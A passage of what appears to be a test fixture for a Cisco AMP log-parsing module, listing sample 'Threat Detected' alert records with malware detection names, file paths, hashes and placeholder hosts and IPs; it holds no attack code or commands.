"GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259080131182683", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 996000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259080131183000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 187917, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:37.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6159251507855228943", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 944000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251507855229000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 189236, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:36.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.detection_id": "6159251503560261640", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 821000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251503560262000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "t.exe", - "file.path": "\\\\?\\C:\\t.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 198516, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:25.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259028591575130", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 984000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259028591575000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 207155, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:21.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.detection_id": "6159251439135752194", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 455000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251439135752000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "t.exe", - "file.path": "\\\\?\\C:\\t.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 208474, - "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", - "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "process.name": "explorer.exe", - "process.pid": 3164, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:14.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258981346934873", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 346000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258981346935000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 210041, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:02.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258929807327320", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 334000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258929807327000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 211360, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:56.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668623368585250", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 753000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668623368585000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 212679, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:50.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258878267719767", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 322000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258878267720000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 216643, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:38.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258826728112214", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 310000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258826728112000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 217962, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:26.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.detection_id": "6159251202912550913", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 262000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251202912551000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "t.exe", - "file.path": "\\\\?\\C:\\Windows\\System32\\t.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 219281, - "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", - "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "process.name": "explorer.exe", - "process.pid": 3164, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:10.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258706469027925", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 292000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258706469028000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 220867, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:04.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258680699224148", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 286000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258680699224000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 222186, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:56.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668365670547487", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 428000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668365670547000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 223505, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:55.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668361375580188", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 616000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668361375580000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 227473, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:52.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258629159616595", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 649000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258629159617000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": 